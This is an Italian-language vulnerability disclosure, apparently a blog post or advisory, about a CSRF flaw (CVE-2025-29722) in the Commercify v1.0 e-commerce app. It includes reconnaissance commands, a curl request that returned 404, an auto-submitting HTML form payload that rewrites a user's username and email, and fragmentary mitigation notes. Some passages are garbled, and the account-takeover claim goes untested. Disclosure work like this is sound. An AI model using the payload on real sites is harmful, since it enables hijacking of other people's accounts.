
Cross Site Request Forgery (CSRF) in Commercify v1.0
Scoperto da: David P.S Abraham (alias Davycipher)
CVE-2025-29722 è stato assegnato a questa vulnerabilità da MITRE Corporation.
Una vulnerabilità CSRF è stata identificata in Commercify v1.0, una piattaforma di e-commerce open-source sviluppata da @yassmittal. L'applicazione manca di adeguati meccanismi di protezione CSRF su endpoint critici come /update_settings, consentendo agli aggressori di creare richieste dannose che modificano i dati utente quando eseguite da un altro dominio.
La scansione con nmap ha rivelato che il servizio era accessibile tramite la porta 5173, indicando un possibile server di sviluppo.
nmap -p 5173 localhost
Successivamente, ho scansionato l'app usando nikto, rivelando:
X-Frame-Options mancanteAccess-Control-Allow-Origin: *)Durante l'esplorazione dell'applicazione, ho sospettato un possibile endpoint update_settings basato sulle funzionalità del dashboard utente. L'ho testato con:
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"
Sebbene sia stato restituito un 404 Not Found, questo comportamento può dipendere dall'ambiente. In distribuzioni valide, ciò potrebbe portare alla manipolazione completa dell'account.
Attacco basato su HTML per sfruttare la falla CSRF:
<form action="http://localhost:5173/update_settings" method="POST">
<input type="hidden" name="username" value="attacker">
<input type="hidden" name="email" value="[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
SameSite nei cookie*)SameSite=Strict o Lax sui cookieDavid P.S. Abraham
Alias: Davycipher